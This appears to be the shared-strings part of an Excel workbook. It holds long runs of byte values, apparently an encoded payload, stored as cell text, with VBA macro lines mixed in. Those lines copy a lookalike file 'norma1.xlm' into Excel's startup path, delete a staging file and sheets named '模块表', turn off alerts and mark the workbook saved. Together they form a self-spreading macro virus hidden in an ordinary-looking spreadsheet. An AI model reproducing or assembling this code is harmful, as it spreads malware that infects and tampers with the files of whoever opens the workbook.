242 103 223 91 224 13 85 238 125 242 200 69 106 255 121 106 106 40 189 7 229 86 254 224 79 67 174 41 165 100 234 249 8 103 190 214 228 88 179 244 151 63 253 108 237 243 247 39 78 218 118 181 139 81 19 179 71 88 222 246 11 113 75 215 83 64 236 142 114 44 92 161 39 240 18 189 115 181 131 237 164 196 184 112 132 61 203 118 175 106 220 190 170 136 111 213 217 206 237 225 147 109 177 32 83 73 165 162 204 129 129 132 215 31 225 156 171 172 201 237 187 109 13 235 99 129 200 249 9 16 213 213 185 24 91 29 189 187 218 48 218 229 239 163 131 189 113 211 173 211 99 253 223 255 251 55 79 8 103 195 248 54 0 128 67 75 220 61 11 120 20 229 181 255 206 78 146 77 8 16 32 96 128 16 192 152 38 34 224 238 38 196 4 40 154 39 65 67 2 73 128 180 6 179 175 217 236 146 217 157 237 236 108 30 202 133 160 160 84 107 109 109 125 92 172 138 104 125 85 124 163 96 171 60 228 90 172 124 92 236 245 83 110 189 126 133 214 235 5 175 90 169 168 81 146 157 123 206 63 255 236 108 50 81 1 191 222 246 222 205 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">fso.copyfile </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>Application.StartupPath &amp; "\norma1.xlm",myfolder,true</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">55 249 223 231 63 231 252 231 127 157 255 159 57 201 246 15 75 207 209 254 225 217 218 31 68 67 28 139 70 155 237 47 94 114 142 245 219 152 237 194 51 173 31 117 137 151 91 244 250 87 146 74 82 1 238 50 192 162 145 92 78 106 72 21 181 228 119 198 246 47 207 218 254 36 218 0 92 48 93 243 251 72 144 200 223 66 200 108 64 127 26 179 203 120 166 245 227 247 65 255 43 241 201 82 203 106 205 189 144 185 143 176 67 130 32 179 208 185 36 155 217 17 155 202 236 152 177 251 155 175 50 247 41 221 46 96 62 179 63 198 194 75 24 60 55 115 211 235 146 237 255 113 100 23 179 87 246 122 234 80 251 101 72 197 134 84 189 165 56 106 213 113 102 26 251 24 42 131 176 36 205 252 157 90 253 135 182 121 208 18 85 58 251 112 246 125 172 140 195 102 46 99 37 211 82 181 183 121 206 79 213 190 62 54 61 85 251 234 214 94 139 102 213 208 194 105 110 5 115 255 55 78 144 50 65 170 145 192 113 12 135 26 230 246 50 247 95 153 59 150 225 212 200 220 91 152 43 130 155 141 254 116 49 147 12 244 247 168 36 202 43 42 154 7 68 45 150 168 168 124 68 77 129 37 49 71 180 136 136 122 218 62 216 159 163 242 173 106 81 155 10 107 103 94 164 185 81 7 98 19 213 209 62 252 14 108 171 186 170 76 229 201 252 58 53 133 172 62 125 113 145 122 122 186 77 85 167 58 121 162 168 17 245 66 158 136 106 171 90 202 147 50 53 71 205 93 15 44 157 0 124 252 254 215 129 92 222 170 14 74 101 106 1 108 164 41 212 2 158 215 209 162 217 120 86 51 81 227 119 66 67 144 11 129 50 149 87 137 58 175 76 37 142 1 127 29 20 253 122 140 227 119 165 17 134 25 113 178 58 190 169 4 159 40 113 117 81 157 202 209 18 243 219 104 209 145 75 108 41 83 231 2 118 5 69 71 227 152 27 136 249 56 254 181 196 108 177 209 2 131 247 50 178 108 180 58 36 140 178 207 166 146 58 168 208 70 10 230 231 168 163 224 255 209 120 6 41 136 239 221 19 199 38 213 177 200 212 176 136 63 58 137 236 96 195 159 102 194 48 133 189 186 </t>
  </si>
  <si>
    <t>a1:</t>
  </si>
  <si>
    <t xml:space="preserve">48 69 84 201 184 83 154 173 72 44 240 48 21 154 9 218 152 113 16 228 163 104 136 61 200 172 196 153 159 102 3 210 158 100 19 81 1 126 69 224 17 33 190 21 30 94 69 165 184 21 112 229 72 17 60 54 120 246 88 217 247 135 19 50 71 77 95 206 249 70 193 99 2 148 187 136 137 76 218 41 178 17 191 24 194 135 13 220 209 202 77 103 88 29 236 175 87 7 62 107 83 201 88 190 77 29 240 215 171 171 79 23 231 94 207 145 54 168 132 47 83 83 50 201 5 163 201 232 58 52 185 94 166 85 89 120 60 94 104 83 11 139 212 79 209 62 236 212 243 17 135 89 249 17 117 234 28 50 171 118 161 122 213 4 146 77 6 131 7 226 3 159 29 137 51 68 166 148 169 165 54 178 80 45 130 134 56 30 39 19 248 35 241 248 222 122 21 121 143 213 125 64 0 67 21 49 164 216 234 201 105 44 185 199 66 46 162 246 58 135 210 61 53 155 124 74 191 245 60 72 157 55 47 86 212 220 42 139 185 125 172 19 242 186 112 71 153 85 184 80 157 58 145 100 76 130 54 154 183 80 37 185 154 201 207 28 181 160 176 94 45 248 20 249 140 101 232 59 136 41 121 239 113 212 80 150 142 75 42 195 101 3 119 198 184 84 115 164 107 88 174 243 128 67 69 106 1 2 76 161 114 183 63 110 240 56 151 241 248 136 37 135 216 246 199 227 219 22 170 154 248 12 126 50 153 76 222 19 183 237 129 56 27 61 164 179 144 129 149 47 67 29 208 123 203 212 253 241 61 241 210 84 198 221 220 5 156 193 203 188 74 36 33 37 111 133 70 203 216 4 95 238 180 208 47 81 158 57 63 184 188 119 17 194 153 146 254 28 167 181 228 89 85 65 150 175 207 34 167 200 43 131 253 253 113 96 76 81 61 29 81 202 140 241 161 140 117 247 253 241 85 11 113 212 204 73 140 154 133 56 106 94 200 83 102 64 127 95 168 246 199 115 235 172 100 156 216 163 14 254 162 76 205 42 129 37 5 200 32 212 49 66 239 229 217 155 19 191 129 190 102 31 210 127 115 136 254 209 111 173 255 30 129 209 162 13 164 118 164 126 92 6 233 251 227 86 178 7 158 133 73 125 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\excel.txt"</t>
  </si>
  <si>
    <t xml:space="preserve">248 56 148 89 107 213 172 78 252 253 231 142 226 162 28 128 199 3 131 79 197 1 40 147 188 195 40 121 34 218 198 157 74 196 83 241 193 96 157 10 35 93 60 240 70 124 147 133 92 138 3 65 171 58 240 97 255 8 37 170 161 4 96 146 144 133 92 114 218 142 114 169 213 142 61 247 82 254 247 113 202 241 111 132 65 7 164 223 199 79 169 175 232 197 161 219 94 106 72 12 76 77 133 109 116 122 250 122 56 104 236 76 159 110 82 242 54 89 168 236 143 2 154 227 235 222 136 63 75 206 112 254 60 16 103 115 219 193 120 242 148 115 48 174 113 255 64 60 105 254 60 24 63 16 255 7 157 63 31 166 243 39 16 179 51 254 181 196 140 60 127 34 97 230 249 51 29 254 63 172 205 159 155 207 126 254 28 54 10 145 9 14 182 230 230 45 57 214 146 33 253 47 151 217 22 198 223 187 80 211 27 240 244 195 243 77 115 233 65 232 131 7 226 67 231 82 59 179 207 60 240 138 182 98 61 156 174 175 245 181 248 100 139 48 201 118 156 39 193 178 175 12 118 2 22 102 189 121 33 117 45 204 229 152 107 213 172 170 175 215 202 124 147 253 230 212 33 247 124 234 40 141 179 201 46 182 2 197 149 51 79 138 200 80 251 205 227 44 198 90 34 111 218 73 182 178 40 33 95 232 107 106 40 101 3 40 51 70 44 53 115 196 210 249 179 73 57 91 222 114 180 82 59 185 224 12 42 157 77 122 89 41 43 45 85 66 134 110 213 70 46 133 42 222 189 204 111 228 182 94 198 1 161 211 94 103 9 101 195 12 84 159 219 207 242 231 167 250 44 236 214 149 125 22 199 253 36 157 68 178 83 97 66 184 150 35 190 135 173 60 201 128 58 87 86 86 44 147 165 53 194 102 175 146 130 251 161 203 184 236 53 169 92 198 119 185 140 52 78 182 100 219 82 82 199 167 115 227 233 245 169 159 147 76 238 242 133 28 76 99 22 185 47 170 248 36 81 88 196 77 38 81 162 192 86 83 34 125 34 17 64 66 252 164 128 107 35 214 89 109 139 43 34 145 118 246 157 247 78 77 209 72 77 37 46 110 119 145 233 124 133 246 169 116 212 228 142 148 105 254 29 46 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">98 197 76 187 21 23 172 201 16 20 83 228 98 198 43 242 92 132 227 87 121 54 1 168 81 125 184 96 180 144 164 228 159 78 115 145 9 44 122 4 216 179 22 184 72 22 159 140 29 42 92 159 73 113 145 204 97 133 48 254 216 159 0 147 204 61 71 29 49 217 69 82 248 42 209 29 141 78 249 181 139 88 248 30 41 203 69 50 104 17 85 109 175 108 239 114 203 237 205 130 178 254 39 0 158 1 170 10 184 117 181 34 213 42 182 62 163 151 176 144 30 81 215 47 78 126 207 32 67 139 165 54 21 211 67 46 16 174 38 65 148 220 190 194 19 64 49 233 14 255 20 40 78 31 90 101 119 184 252 148 139 140 97 229 87 68 124 110 69 168 149 165 16 214 122 223 36 83 246 198 112 233 39 46 50 154 101 175 14 70 35 162 187 23 53 125 74 244 212 103 64 33 161 90 87 247 165 46 24 11 154 133 48 213 148 54 228 25 36 53 9 107 4 175 82 33 138 26 109 209 213 191 195 156 126 168 76 2 110 205 56 2 205 53 180 66 61 169 104 43 146 19 237 141 42 66 200 125 159 142 66 34 155 150 240 218 84 200 196 106 210 180 240 25 16 99 37 21 62 223 231 50 178 160 194 183 174 13 176 76 206 114 229 155 122 203 25 205 128 241 117 91 92 132 215 27 66 138 244 190 178 27 33 129 175 126 61 98 130 81 171 60 119 110 64 65 19 122 132 203 110 50 53 38 196 46 175 211 155 38 17 235 233 85 132 191 0 132 52 158 221 198 72 45 69 184 254 168 244 254 45 128 8 161 167 31 168 105 4 54 245 223 8 130 66 186 67 89 200 163 80 175 95 18 125 130 188 161 5 154 139 52 71 4 111 208 45 214 210 168 168 109 3 22 213 210 133 158 96 84 137 62 152 129 49 94 10 76 139 255 96 187 9 67 168 244 116 61 196 82 254 107 229 30 195 186 134 73 200 164 109 128 161 222 126 177 112 251 97 61 139 133 212 198 68 17 47 200 29 190 7 40 34 64 49 66 202 123 71 23 168 100 94 96 202 182 163 136 21 246 139 22 161 71 65 17 123 232 5 172 191 86 146 81 102 131 32 17 229 192 117 138 79 193 199 38 222 97 116 211 10 19 </t>
  </si>
  <si>
    <t>for i=1 to thisworkbook.sheets.count</t>
  </si>
  <si>
    <t xml:space="preserve">130 254 212 109 216 182 66 207 119 86 155 228 85 232 57 116 210 104 240 42 84 95 79 185 25 185 186 198 109 166 116 77 198 54 35 239 74 183 24 19 222 189 194 36 144 122 59 100 204 70 146 169 184 55 72 211 238 6 96 188 110 95 245 203 191 0 81 188 24 65 63 114 231 159 157 64 54 132 155 4 204 81 25 243 251 15 191 79 243 215 54 183 52 173 168 106 9 1 247 82 249 238 102 165 87 20 182 220 140 41 157 130 28 22 196 98 103 251 47 129 34 62 97 35 245 196 119 112 16 9 160 55 63 23 243 137 17 132 38 200 139 110 119 145 137 124 184 33 22 242 8 114 163 191 18 132 44 218 34 209 114 143 129 124 79 130 140 67 210 48 69 17 194 173 229 26 98 141 93 130 44 186 35 17 193 23 202 67 212 27 87 214 52 213 87 44 91 86 83 189 35 27 90 129 79 50 82 251 189 1 148 221 128 38 160 183 143 55 245 29 138 92 227 81 163 239 52 7 175 22 62 58 141 173 28 237 70 124 176 17 15 29 50 181 45 102 155 234 70 242 68 244 110 147 32 7 241 98 189 48 80 248 4 113 53 128 24 63 180 72 82 234 162 119 112 236 193 190 21 125 124 189 169 201 116 46 253 54 100 66 151 86 118 75 49 242 223 75 57 179 254 67 100 128 191 54 216 35 248 96 120 235 108 253 5 242 57 92 35 203 85 146 79 40 232 130 246 216 104 3 8 86 24 202 162 130 220 37 248 28 95 92 99 142 116 126 121 13 194 137 94 189 204 173 4 80 6 226 99 1 45 2 45 222 190 180 162 117 89 69 75 93 67 197 210 154 102 1 169 196 163 182 101 114 176 11 186 234 107 128 9 207 71 21 57 182 102 30 52 219 176 177 119 104 225 247 26 76 76 196 130 111 110 193 217 77 20 167 93 133 136 47 9 43 32 74 110 241 131 1 108 105 61 84 23 236 8 60 159 14 68 83 172 45 68 242 251 97 52 58 254 40 109 123 234 199 28 23 172 70 182 104 39 168 157 55 33 98 18 200 201 134 66 28 127 180 145 69 129 94 140 237 121 253 139 192 1 218 107 105 155 236 108 215 7 252 33 93 151 166 13 6 176 175 122 122 159 109 51 229 129 81 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">90 134 89 174 209 127 199 127 211 161 54 32 95 177 14 229 134 37 67 184 109 1 246 185 38 1 38 29 175 224 31 131 129 80 180 195 35 245 116 231 254 208 52 230 176 148 173 63 66 220 162 1 73 86 194 208 14 185 178 169 222 68 218 209 78 148 34 26 236 30 109 18 21 26 127 255 235 88 105 135 64 201 182 205 71 208 24 160 35 66 248 61 125 248 49 214 0 209 202 15 96 174 226 53 118 121 221 30 44 118 195 111 17 6 11 244 110 199 58 155 97 57 163 220 124 33 142 125 48 163 6 115 167 155 155 22 162 55 111 196 217 198 45 203 163 98 166 177 28 98 115 157 200 54 111 192 49 107 157 230 113 94 196 60 197 179 153 167 100 14 243 204 155 203 60 165 23 51 207 37 118 230 41 115 48 79 185 115 29 34 4 0 237 207 223 198 124 142 157 186 207 185 235 54 211 44 188 162 82 138 133 125 111 251 76 109 193 136 93 123 31 182 167 15 15 2 233 56 208 120 55 2 195 179 195 29 157 56 199 121 97 82 197 248 129 7 113 136 246 126 63 11 103 90 237 162 195 31 143 152 106 211 18 150 52 35 182 62 73 121 100 163 137 105 8 121 230 235 198 242 168 89 113 203 74 44 130 125 50 120 74 103 33 151 184 220 32 68 173 184 22 34 13 20 112 11 187 97 240 131 199 140 193 12 75 58 215 163 4 71 165 124 243 98 42 42 189 6 171 163 44 20 137 168 54 65 107 146 177 188 13 7 205 253 247 239 62 241 212 135 142 103 61 70 192 185 35 41 80 252 92 82 160 228 249 164 192 188 157 73 129 210 93 73 129 75 94 240 96 119 119 59 58 177 10 29 75 89 2 97 83 222 242 39 173 134 220 93 66 69 212 191 128 10 27 250 221 175 26 249 171 181 211 231 27 127 103 44 4 123 68 45 82 43 119 250 157 164 241 60 32 117 143 253 212 152 39 113 112 139 30 218 109 44 127 155 244 123 7 142 42 199 14 175 177 86 168 2 94 226 141 3 236 249 122 55 161 119 13 112 252 235 186 222 136 236 17 241 206 193 65 119 136 238 114 120 216 84 226 102 247 97 171 37 201 48 51 26 255 250 146 190 55 176 120 136 53 221 18 82 67 106 </t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets(i).Delete</t>
  </si>
  <si>
    <t xml:space="preserve">191 133 53 221 124 112 231 66 40 159 148 195 83 69 230 67 13 218 249 219 98 248 95 65 214 17 7 196 84 65 120 41 252 53 146 6 22 179 148 44 129 88 204 215 204 98 180 211 59 221 45 101 190 26 240 205 37 213 164 30 254 242 33 38 8 27 160 24 113 19 17 54 118 149 224 70 33 198 11 254 90 216 18 201 224 86 144 8 252 137 52 214 13 91 165 32 196 135 233 29 199 164 157 182 197 204 7 180 42 92 252 173 248 224 0 60 139 193 181 39 241 65 134 218 59 224 191 155 132 40 142 65 130 187 182 40 165 31 49 196 244 40 60 126 192 116 6 240 2 95 125 9 82 243 133 109 195 66 53 164 21 160 214 0 23 202 161 158 70 112 43 161 158 145 160 212 144 30 90 6 57 84 78 219 6 33 123 200 26 136 243 210 28 245 80 202 67 177 146 73 239 16 206 236 28 81 66 138 135 241 227 108 57 227 100 18 98 112 102 21 180 126 3 252 181 128 63 10 56 224 166 86 0 30 21 67 222 182 196 22 23 121 133 101 21 240 121 160 44 82 93 67 219 56 6 113 18 228 55 90 56 249 151 145 104 95 39 72 78 45 180 109 53 197 166 10 240 156 7 124 51 172 40 161 141 164 57 240 84 3 220 121 140 138 10 106 105 201 78 173 18 105 241 206 4 21 142 191 89 251 134 104 62 108 47 31 192 16 191 162 109 147 203 156 125 235 82 133 60 207 19 158 35 36 149 179 16 180 123 152 1 110 22 55 244 196 91 123 123 235 236 79 59 147 85 44 24 50 255 186 98 28 201 129 86 15 208 126 188 138 246 217 78 192 86 130 191 78 146 61 162 57 81 85 157 200 125 117 25 85 69 99 246 84 231 194 37 89 62 29 24 139 1 158 92 179 214 65 193 150 141 0 118 47 167 165 171 234 147 63 100 186 35 6 2 65 145 27 151 99 0 223 66 178 88 34 220 223 255 141 79 251 63 0 14 255 95 126 228 92 120 41 175 189 189 117 207 210 250 199 187 199 197 123 182 157 159 167 73 188 246 213 121 212 178 238 172 253 205 196 27 6 231 206 209 123 210 219 79 62 37 220 51 101 122 253 182 192 230 252 237 247 215 247 235 249 245 119 71 182 183 150 </t>
  </si>
  <si>
    <t xml:space="preserve">95 249 174 237 228 150 228 175 192 230 36 89 62 210 52 184 229 220 149 22 149 60 214 172 157 9 165 247 101 227 113 45 73 172 252 169 62 148 69 186 195 189 168 235 229 244 60 48 233 141 131 85 136 22 194 189 26 106 184 83 18 97 216 175 19 242 221 68 233 234 96 136 222 210 208 131 18 129 81 78 47 45 184 189 1 106 47 88 15 139 81 128 214 152 8 215 244 4 21 66 150 19 75 95 22 13 3 94 77 137 170 240 158 42 228 110 73 84 229 151 100 66 174 98 133 45 100 177 164 72 120 125 71 175 122 9 148 246 36 66 65 24 219 99 132 223 152 67 67 168 156 195 15 9 234 21 215 75 225 14 2 195 156 17 150 34 132 92 151 168 42 44 116 19 178 41 17 108 144 0 205 235 97 29 151 8 6 130 8 224 134 4 128 134 152 8 108 185 13 214 129 90 120 89 12 175 198 18 114 119 34 6 24 31 11 1 61 15 36 160 54 11 0 245 9 35 24 243 16 242 116 2 34 218 119 36 228 153 4 65 72 236 179 70 170 28 3 88 47 37 152 181 42 0 203 121 66 246 194 90 155 69 4 21 118 39 151 144 125 137 108 84 51 144 146 89 211 227 21 196 190 139 80 101 186 178 178 226 243 63 161 58 96 85 48 236 40 221 187 142 121 139 157 105 235 113 19 4 11 199 103 158 198 45 41 228 43 221 158 143 169 187 30 120 230 160 35 2 59 167 212 76 77 189 252 51 23 44 241 51 117 21 181 87 121 105 55 166 193 254 54 232 21 38 194 14 42 243 71 69 180 193 240 242 174 190 95 91 251 103 99 29 218 94 211 229 22 99 176 106 205 249 119 220 8 83 173 160 227 248 148 132 223 121 194 240 23 191 15 126 27 219 78 235 192 58 115 112 239 167 135 232 203 30 119 29 195 45 141 118 191 245 142 38 170 220 209 237 164 238 141 27 27 149 36 253 246 47 103 185 72 118 210 218 155 217 4 213 77 130 202 247 22 25 197 180 52 216 229 40 194 218 143 140 245 61 43 114 191 207 88 140 183 87 11 126 119 76 84 214 236 51 178 225 101 99 143 40 60 247 111 6 64 118 249 23 109 138 102 228 226 94 13 173 135 190 117 181 11 186 115 31 </t>
  </si>
  <si>
    <t xml:space="preserve">221 248 76 140 24 59 1 180 62 26 157 89 111 218 56 211 248 49 89 184 233 141 72 145 16 132 70 93 101 218 33 178 148 49 77 184 15 100 129 232 184 14 147 46 71 79 218 178 200 32 70 55 123 90 176 15 183 130 128 98 214 86 179 174 83 146 215 212 227 174 50 232 50 43 254 130 233 168 248 3 106 99 97 197 222 101 112 132 1 254 227 175 76 232 178 20 239 19 70 230 42 119 4 219 43 171 39 105 123 3 185 144 99 209 15 158 50 182 98 244 30 172 176 19 178 141 51 100 163 65 232 166 114 116 209 90 220 206 53 7 114 219 13 242 244 180 63 164 187 200 4 163 72 53 140 98 10 213 26 77 41 65 249 199 13 161 227 21 47 234 112 232 69 112 170 180 235 238 51 31 50 196 60 47 222 106 226 171 14 182 248 227 33 149 104 7 31 184 11 204 20 81 159 164 237 7 87 44 249 164 31 69 191 202 141 23 190 79 222 105 28 75 24 249 223 126 19 91 18 111 120 67 192 247 227 127 49 213 168 39 157 119 183 177 237 172 64 138 4 189 246 9 73 234 88 4 233 243 189 106 218 114 47 241 47 251 43 178 204 27 56 216 102 74 244 6 148 147 208 5 117 45 173 134 238 241 31 104 81 48 216 136 238 16 237 99 155 14 32 174 93 30 45 67 225 71 198 102 182 38 236 134 46 161 13 88 255 177 215 136 103 136 210 142 245 50 12 88 217 195 89 70 185 255 244 91 70 87 74 138 94 183 0 171 211 95 9 106 123 0 58 22 27 57 240 237 143 242 199 177 163 117 121 26 164 135 10 146 182 221 64 255 173 135 13 126 212 7 195 66 244 133 67 166 206 70 227 31 186 213 144 193 149 149 108 248 107 12 160 242 125 101 37 244 233 136 20 70 130 50 10 81 29 131 122 205 165 146 47 38 10 199 114 233 9 4 246 130 70 63 5 52 179 205 144 219 122 33 220 161 4 190 183 95 83 212 248 4 17 50 172 154 130 26 48 61 20 125 240 94 212 103 106 2 78 203 103 94 103 136 177 118 20 85 17 13 40 46 50 145 198 89 73 40 42 213 132 161 56 204 90 40 179 213 2 234 45 6 46 115 145 243 120 24 118 14 190 140 154 22 191 191 </t>
  </si>
  <si>
    <t>Application.DisplayAlerts = True</t>
  </si>
  <si>
    <t xml:space="preserve">124 181 78 183 149 160 122 57 218 221 138 29 93 12 119 86 61 129 250 26 237 204 164 25 245 115 222 152 210 85 141 84 181 184 229 14 65 65 125 205 93 95 160 124 8 78 178 26 49 151 133 14 58 217 204 92 132 152 67 72 211 70 165 6 146 58 178 36 198 66 225 104 164 220 36 79 126 255 177 147 72 161 206 107 193 175 44 63 102 234 96 128 87 139 136 152 7 186 126 182 26 135 156 176 144 133 78 200 151 101 130 24 232 90 240 87 211 112 20 30 179 205 20 23 26 189 45 73 23 186 52 232 251 48 130 60 112 123 188 143 201 102 101 160 199 251 226 197 244 32 69 18 125 167 199 154 15 82 32 186 35 134 3 114 179 34 87 73 225 174 30 170 212 213 7 8 45 238 154 169 200 161 46 207 138 112 16 27 184 255 65 156 185 186 60 171 130 62 97 106 33 10 74 151 7 36 43 34 200 85 238 168 112 252 115 228 11 100 142 176 136 206 185 90 47 195 179 68 6 193 254 18 82 208 229 169 11 202 238 14 119 216 253 200 61 90 175 107 112 203 178 212 253 159 141 26 132 122 169 91 131 176 239 168 137 91 62 105 235 73 68 74 148 188 110 17 21 133 151 93 101 210 230 38 210 54 117 32 131 66 221 158 95 239 64 15 204 190 183 238 198 81 190 190 69 14 134 78 121 144 2 189 29 49 230 24 158 173 144 38 244 110 58 148 148 72 99 228 91 105 73 68 107 254 137 228 146 24 83 184 29 26 27 13 30 227 229 236 137 28 73 92 188 222 203 89 18 126 66 95 147 228 206 96 161 62 134 195 50 218 38 118 60 103 165 175 110 141 161 251 185 11 70 58 166 63 131 152 255 147 191 107 236 246 62 187 211 94 82 108 159 67 108 211 120 190 10 246 246 99 44 227 237 246 18 82 250 79 249 206 185 246 124 59 201 175 154 223 182 106 73 67 3 105 105 211 14 128 109 197 206 54 171 215 57 87 17 137 39 191 177 190 102 70 69 12 22 168 218 32 159 6 107 116 203 117 213 116 253 151 178 177 186 177 111 17 85 61 204 187 182 250 150 190 113 155 250 44 27 170 157 213 164 182 172 218 94 82 53 103 30 169 172 173 152 227 176 59 42 103 204 169 </t>
  </si>
  <si>
    <t>ThisWorkbook.Saved=True</t>
  </si>
  <si>
    <t xml:space="preserve">172 174 153 215 87 93 81 49 175 175 178 164 47 197 185 185 186 239 142 14 153 184 67 51 232 80 68 218 150 6 189 178 20 149 138 252 202 12 107 105 27 111 13 69 251 164 242 185 62 81 204 31 157 213 55 163 124 174 125 70 163 199 178 139 204 168 15 122 100 183 220 123 83 95 21 177 140 229 14 114 100 194 181 86 91 87 108 50 183 21 23 160 137 69 227 230 197 36 167 111 2 234 7 188 54 212 15 252 10 213 3 143 122 250 172 82 159 117 202 143 207 115 254 97 212 182 220 61 227 97 159 86 105 113 112 138 11 53 3 121 149 156 37 101 246 242 125 51 127 190 232 252 74 219 69 149 150 201 27 137 117 143 101 207 81 199 226 107 211 183 162 78 96 202 38 222 121 61 191 164 113 210 141 203 27 39 61 249 195 170 73 69 163 42 39 189 124 94 214 62 238 43 249 175 221 191 73 126 64 176 214 13 127 98 236 142 73 70 226 94 14 49 189 117 144 206 110 0 106 110 26 94 98 74 127 157 85 124 34 197 184 65 68 239 185 67 218 35 105 195 223 191 176 159 219 251 23 103 253 254 131 132 58 29 135 249 253 15 199 57 190 255 145 201 174 109 157 105 253 13 104 61 139 245 223 161 111 125 116 147 208 89 214 159 125 14 244 175 128 167 248 127 218 251 14 184 38 150 111 255 77 40 210 69 69 69 4 141 88 64 20 12 161 163 40 105 64 2 4 5 43 69 65 186 138 160 128 5 69 233 96 5 65 41 86 80 84 138 84 81 138 130 88 174 13 20 225 138 5 123 225 10 138 5 193 130 5 255 51 147 93 8 17 244 234 125 255 247 121 239 253 110 248 28 118 247 59 179 103 103 167 158 115 230 204 44 214 219 243 127 239 253 161 71 151 220 47 188 255 108 64 79 136 254 75 2 175 26 162 160 238 188 186 95 189 170 236 105 50 179 34 109 187 214 126 131 13 49 16 211 144 119 9 13 22 181 231 132 152 108 140 91 123 55 109 62 184 111 61 196 151 139 25 109 59 94 251 204 52 109 122 153 228 160 132 162 213 16 163 133 55 122 13 42 46 99 30 54 185 186 121 239 92 165 99 16 11 45 30 107 165 228 23 69 47 15 124 46 175 128 189 137 </t>
  </si>
  <si>
    <t>End Sub</t>
  </si>
  <si>
    <t xml:space="preserve">224 223 91 103 17 114 218 221 180 48 165 85 90 124 180 245 50 136 25 157 205 110 90 189 60 205 44 235 48 51 97 118 233 160 19 16 27 233 226 219 188 118 113 187 229 134 131 135 159 171 240 190 208 32 22 220 178 249 74 252 35 53 139 228 254 15 156 154 226 219 26 32 70 10 189 221 90 57 166 159 121 137 228 192 218 50 223 134 76 136 121 139 191 60 176 235 162 11 51 218 168 242 241 117 214 123 25 132 149 203 152 229 104 62 182 202 213 107 173 189 48 139 236 8 49 110 53 139 150 44 97 108 30 171 183 83 230 156 206 117 81 148 102 241 251 83 170 94 78 165 31 11 93 63 235 161 105 181 54 196 30 54 100 155 169 239 92 66 47 170 107 223 155 199 75 64 105 118 220 158 226 151 176 167 134 125 48 246 216 243 79 117 201 101 16 107 153 57 242 175 227 19 15 242 210 42 86 235 166 150 188 211 128 88 225 234 39 141 85 254 135 204 66 95 245 55 113 136 120 233 4 49 131 246 71 113 69 247 92 45 43 44 206 184 246 83 77 44 135 216 20 221 171 233 185 77 20 211 125 47 138 84 251 91 223 155 3 10 86 22 126 62 70 10 53 99 41 50 89 84 28 195 164 161 195 161 42 230 142 173 2 228 129 27 143 85 97 179 151 134 78 136 174 200 200 236 15 176 0 16 186 4 115 193 60 49 45 60 54 140 51 162 43 78 95 177 96 74 94 252 213 185 119 229 240 203 156 4 15 147 148 134 115 250 102 68 169 223 80 14 217 39 162 125 204 122 7 125 243 133 11 115 94 163 156 25 23 126 96 87 106 29 213 60 93 204 245 164 67 62 207 10 98 139 238 198 214 85 27 71 89 236 124 249 236 149 130 60 115 23 241 38 10 120 163 17 133 243 77 36 126 122 151 131 103 186 32 83 126 0 74 65 64 215 91 65 78 46 241 151 213 125 149 147 24 81 219 14 253 241 90 234 244 17 136 201 157 142 246 77 156 95 105 118 130 29 167 159 154 58 0 126 233 91 196 203 97 203 173 87 90 103 216 69 207 252 90 118 212 111 57 7 49 222 211 67 107 15 217 167 242 14 113 207 12 189 52 69 100 24 196 238 24 95 48 105 27 199 225 69 110 47 </t>
  </si>
  <si>
    <t xml:space="preserve">44 127 97 31 34 129 242 221 102 244 241 65 143 211 232 5 167 155 55 170 100 200 141 134 152 226 235 7 202 229 123 171 205 163 30 61 201 84 121 52 123 5 196 166 78 139 142 87 25 230 110 157 123 205 101 62 77 117 200 120 136 37 207 184 60 75 206 122 141 101 212 186 148 154 21 173 3 225 62 67 34 211 60 51 14 29 52 11 225 21 110 174 229 101 47 231 236 129 24 99 148 125 210 224 55 20 230 169 130 116 251 108 21 205 131 16 123 22 166 56 145 137 253 73 207 55 138 57 126 68 199 177 17 98 137 167 227 43 18 157 243 76 75 174 165 189 175 27 70 190 11 177 216 136 233 227 247 126 56 197 45 50 60 69 158 116 197 235 17 196 46 205 61 127 212 85 97 145 69 126 213 132 50 183 202 225 129 16 27 21 105 127 155 162 236 195 202 123 59 155 30 183 53 38 12 98 210 147 58 26 74 154 101 76 75 103 172 24 31 236 212 239 14 196 84 207 121 14 14 182 105 97 108 117 86 28 103 106 152 3 191 188 46 242 114 225 124 199 212 13 7 44 179 242 120 49 77 137 107 58 33 22 233 171 120 59 58 92 222 34 239 188 228 224 40 218 27 196 47 64 119 244 177 93 19 54 178 195 199 222 184 59 220 162 30 189 155 113 186 231 142 75 143 242 216 229 39 213 236 63 125 125 247 30 98 121 57 235 70 95 90 60 199 188 220 226 196 214 64 207 22 29 136 69 245 187 22 120 122 209 88 110 134 17 121 148 129 65 117 169 44 24 167 232 210 2 91 39 146 165 177 91 82 221 253 81 165 178 236 149 5 73 70 236 240 214 138 164 5 97 24 170 109 254 30 225 99 100 199 229 113 51 37 101 213 212 12 28 119 161 114 185 161 248 180 221 217 210 124 215 149 119 73 27 111 47 69 121 225 26 39 95 237 211 80 197 60 54 33 60 69 212 41 92 22 98 234 110 105 39 171 93 84 24 91 119 107 74 177 42 3 205 80 91 63 80 234 50 57 122 164 89 129 83 213 232 53 158 233 67 33 150 179 236 201 211 216 231 11 76 163 183 118 222 159 59 96 221 105 136 13 90 125 113 207 230 140 155 244 13 246 139 234 39 222 82 12 7 163 167 180 2 </t>
  </si>
  <si>
